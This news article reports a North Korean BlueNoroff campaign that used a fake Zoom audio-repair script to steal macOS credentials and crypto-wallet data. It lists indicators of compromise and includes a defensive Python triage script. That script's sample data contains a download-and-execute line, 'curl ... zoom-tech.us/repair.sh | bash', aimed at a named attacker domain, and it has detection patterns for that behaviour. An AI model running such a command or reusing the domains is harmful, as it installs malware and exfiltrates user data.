Zoom App Targeted by BlueNoroff Hackers for Infostealer Malware Attack

A recent investigation by cybersecurity experts at Field Effect Analysis has uncovered a targeted cyberattack leveraging the popular Zoom video conferencing platform as a vector for infostealer malware.

This sophisticated campaign is attributed to BlueNoroff, a North Korean state-sponsored hacking group, known for its financially motivated operations under the notorious Lazarus Group umbrella.

In the attack, the threat actors exploited the trust users place in routine business workflows built around Zoom, a tool essential for remote collaboration.

Starting with a scheduled Zoom meeting on May 28, 2025, involving a Canadian online gambling provider, the attackers impersonated a known contact, a tactic consistent with their previous attacks involving credential theft and impersonation.

The attack began after victims experienced technical difficulties during a meeting, with a second participant prompting the user to run a script masquerading as a Zoom audio repair tool.

The script, displayed as a benign update utility for Zoom, was in reality a carefully constructed attack.

After approximately 10,000 blank lines, likely inserted to push the malicious content out of view, the script downloaded and executed a secondary payload from a fake domain: zoom-tech[.]us.

WHOIS records and threat intelligence sources showed this domain, registered under daniel.castagnolii@gmail[.]com on April 14, 2025, was not affiliated with Zoom’s legitimate services.

Several similar domains were also found to have been registered around the same time, indicating a broad campaign.

Technical Exploit Chain: Rapid Infection and Data Exfiltration

Once executed, the payload performed a rapid infection sequence:

  1. Initial Script Execution:
    The victim’s credentials were harvested, stored in temporary files, and exfiltrated using curl commands.
  2. Malware Implantation:
    Additional malware components were downloaded, masquerading as legitimate macOS utilities. The malware used persistence techniques such as installing LaunchDaemons under names like com.apple.security.update and com.apple.wifi.updater.
  3. Data Collection:
    The attackers collected system and network information, browser profiles, login data, cookies, and specifically targeted cryptocurrency wallet-related browser extensions. Data was staged in temporary directories before being compressed and exfiltrated to attacker-controlled servers.

The attack’s speed and stealth were significant: data exfiltration began even before the malware was fully installed.

Attackers used built-in macOS tools such as caffeinate to prevent the system from sleeping, ran commands such as ps aux and ifconfig, and performed targeted file searches to harvest sensitive information.

Indicators of Compromise (IoCs) and Mitigation Strategies

Key indicators of compromise include specific file paths and malicious domains, such as:

  • Binaries: /Library/RestoreKey/com.apple.siri.updater, /Users/<username>/Library/com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater
  • C2 Domains: zoom-tech[.]us, ajayplamingo[.]com, zmwebsdk[.]com
  • IP: 23.254.203[.]244
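The following triage script is an added example, not tooling from Field Effect or from the article, that turns the indicators above and the attack-chain details (the blank-line padding, the curl-based download, the com.apple.* LaunchDaemon names) into checks a responder can run over a suspicious script and over launchd plists. The IoC values are taken from the article with the defanging brackets removed; the blank-line threshold, the regex heuristics, and the sample plist, script and username are assumptions constructed for the demo.

```python
"""Triage helpers for the macOS infostealer chain described in the article.

Added example; not Field Effect's or the article's own code. The IoC values
are quoted from the article. The threshold, regexes and sample data below
are constructed assumptions for demonstration.
"""
import plistlib
import re
from pathlib import Path

# Indicators quoted in the article (defanging brackets removed).
SUSPICIOUS_LABELS = {"com.apple.security.update", "com.apple.wifi.updater"}
SUSPICIOUS_PATH_FRAGMENTS = (
    "/Library/RestoreKey/com.apple.siri.updater",
    "/Library/com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater",
)
C2_HOSTS = {"zoom-tech.us", "ajayplamingo.com", "zmwebsdk.com", "23.254.203.244"}

# Assumed heuristic threshold: legitimate repair scripts do not carry
# thousands of consecutive empty lines before their first real command.
BLANK_RUN_THRESHOLD = 1000

LAUNCH_DIRS = ("/Library/LaunchDaemons", "/Library/LaunchAgents",
               "~/Library/LaunchAgents")


def longest_blank_run(text: str) -> int:
    """Length of the longest run of consecutive whitespace-only lines."""
    run = best = 0
    for line in text.splitlines():
        if line.strip():
            run = 0
        else:
            run += 1
            best = max(best, run)
    return best


def scan_script(text: str) -> list[str]:
    """Findings for a shell script a user was told to run as a 'repair tool'."""
    findings = []
    run = longest_blank_run(text)
    if run >= BLANK_RUN_THRESHOLD:
        findings.append(f"padding: {run} consecutive blank lines")
    # Any URL whose host is a known C2 domain or IP from the article.
    for m in re.finditer(r"https?://([A-Za-z0-9.-]+)", text):
        host = m.group(1).lower()
        if host in C2_HOSTS:
            findings.append(f"known C2 host: {host}")
    # Download-and-execute in one pipeline is the pattern the article describes.
    if re.search(r"\bcurl\b[^|\n]*\|\s*(ba|z)?sh\b", text):
        findings.append("curl output piped straight into a shell")
    return findings


def scan_launch_plist(plist_bytes: bytes) -> list[str]:
    """Findings for one LaunchDaemon/LaunchAgent plist body."""
    try:
        data = plistlib.loads(plist_bytes)
    except Exception:
        return ["unparseable plist"]  # worth a manual look on its own
    findings = []
    label = str(data.get("Label", ""))
    if label in SUSPICIOUS_LABELS:
        findings.append(f"label matches IoC: {label}")
    program = data.get("Program")
    targets = [str(a) for a in data.get("ProgramArguments", [])]
    if program:
        targets.append(str(program))
    for t in targets:
        if any(t.endswith(frag) for frag in SUSPICIOUS_PATH_FRAGMENTS):
            findings.append(f"program path matches IoC: {t}")
    return findings


def scan_host_launch_items() -> dict[str, list[str]]:
    """Walk the usual launchd directories on a live Mac (empty elsewhere)."""
    results = {}
    for d in LAUNCH_DIRS:
        for p in Path(d).expanduser().glob("*.plist"):
            findings = scan_launch_plist(p.read_bytes())
            if findings:
                results[str(p)] = findings
    return results


# Constructed sample data: the username, the plist body and the script are
# made up for this demo; only the label, path and domain come from the article.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
  <key>Label</key><string>com.apple.wifi.updater</string>
  <key>ProgramArguments</key>
  <array>
    <string>/Users/alice/Library/com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
"""
SAMPLE_SCRIPT = "#!/bin/bash\n" + "\n" * 10000 + "curl -s https://zoom-tech.us/repair.sh | bash\n"

if __name__ == "__main__":
    print("script:", scan_script(SAMPLE_SCRIPT))
    print("plist:", scan_launch_plist(SAMPLE_PLIST))
    print("host:", scan_host_launch_items())
```

The plist check deliberately matches on both the label and the program path, because either alone can be renamed cheaply; the script check flags the padding, the known host and the download-to-shell pipeline separately so that a variant that changes only the domain still produces two findings.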

To defend against such threats, organizations should:

  • Educate users on recognizing social engineering attempts, especially impersonation during video calls.
  • Restrict script execution from untrusted locations and enforce application whitelisting.
  • Utilize MDR/EDR solutions to monitor for suspicious behavior and block data exfiltration.
  • Continuously audit endpoints and maintain strict least privilege access controls.

This incident highlights the evolving tactics of financially motivated APT groups, who are increasingly embedding malicious activity within routine business operations and leveraging trusted tools to exploit user trust, underscoring the need for vigilant cybersecurity awareness and robust technical defenses.

Priya
